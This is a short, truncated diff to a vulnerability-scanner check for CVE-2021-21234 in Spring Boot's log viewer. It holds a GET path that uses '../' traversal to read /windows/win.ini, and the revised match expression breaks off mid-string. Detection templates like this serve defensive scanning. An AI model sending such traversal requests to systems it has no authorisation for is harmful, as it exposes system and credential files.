diff --git a/WebScan/pocs/springboot-cve-2021-21234.yml b/WebScan/pocs/springboot-cve-2021-21234.yml index 6bf8103..d10f5fa 100644 --- a/WebScan/pocs/springboot-cve-2021-21234.yml +++ b/WebScan/pocs/springboot-cve-2021-21234.yml @@ -3,19 +3,19 @@ groups: spring1: - method: GET path: /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ - expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts") + expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts") && !response.body.bcontains(b"